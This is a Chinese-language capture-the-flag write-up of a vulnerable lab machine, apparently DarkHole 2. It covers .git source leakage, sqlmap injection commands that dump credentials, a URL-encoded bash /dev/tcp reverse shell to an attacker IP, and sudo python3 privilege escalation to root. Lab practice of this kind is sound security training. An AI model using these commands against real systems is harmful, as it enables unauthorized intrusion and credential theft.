前言
这是打靶训练的第28周,难度中,靶机下载
信息搜集
nmap扫描结果
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
非常普通的一个网页,还有右上角有个login登录按钮就没有了
通过dirsearch发现存在.git目录
[21:37:10] 301 - 311B - /.git -> http://10.16.122.62/.git/
[21:37:10] 200 - 3KB - /.git/
[21:37:10] 200 - 41B - /.git/COMMIT_EDITMSG
[21:37:10] 200 - 130B - /.git/config
[21:37:10] 200 - 6KB - /.git/objects/
[21:37:10] 200 - 1KB - /.git/refs/
[21:37:10] 200 - 41B - /.git/refs/heads/master
存在git源码泄露,可以直接使用wget -r http://10.16.122.62/.git/
来下载,不用任何工具
下载完毕后,通过git log
查看git提交日志,在最后一次提交中备注:让login.php更安全,那意思是第二次提交的login.php不安全呗
做好备份文件,进入分支版本查看第二次的提交
git clone . backup
cd backup
git checkout a4d900a8d85e8938d3601f3cef113ee293028e10
得到用户名为:lush@admin.com 密码:321
通过上面账号登录进来,url经典id=1
上sqlmap进行梭哈
python sqlmap.py -u "http://10.16.122.62/dashboard.php?id=1" --cookie="PHPSESSID=rr8uq05109vt 83k8gpgdiv3245" --dbs
查看表
python sqlmap.py -u "http://10.16.122.62/dashboard.php?id=1" --cookie="PHPSESSID=rr8uq05109vt 83k8gpgdiv3245" -D darkhole_2 --tables
查看ssh表数据
python sqlmap.py -u "http://10.16.122.62/dashboard.php?id=1" --cookie="PHPSESSID=rr8uq05109vt 83k8gpgdiv3245" -D darkhole_2 -T ssh --dump
提权
方法一
通过用户名:jehad、密码:fool成功ssh登录。得到有三个用户
通过查看.bash_history
文件,这提示太明显了,直接运行命令,以losy
用户权限运行
将bash -c 'bash -i >& /dev/tcp/10.16.122.71/4444 0>&1'
进行url编码后,完整的反弹shell命令
curl "http://127.0.0.1:9999/?cmd=bash%20-c%20%27bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F10.16.122.71%2F4444%200%3E%261%27"
python3 -c 'import pty; pty.spawn("/bin/bash")' # 获取tty
cd /home/losy
,继续查看.bash_history
获取losy的密码为gang,sudo python3 -c 'import os; os.system("/bin/bash")'
成功提权
方法二
在前面的提权过程中,没有用到lama
用户,这里我爆破出它的ssh密码为123。提权过程看图,不多解释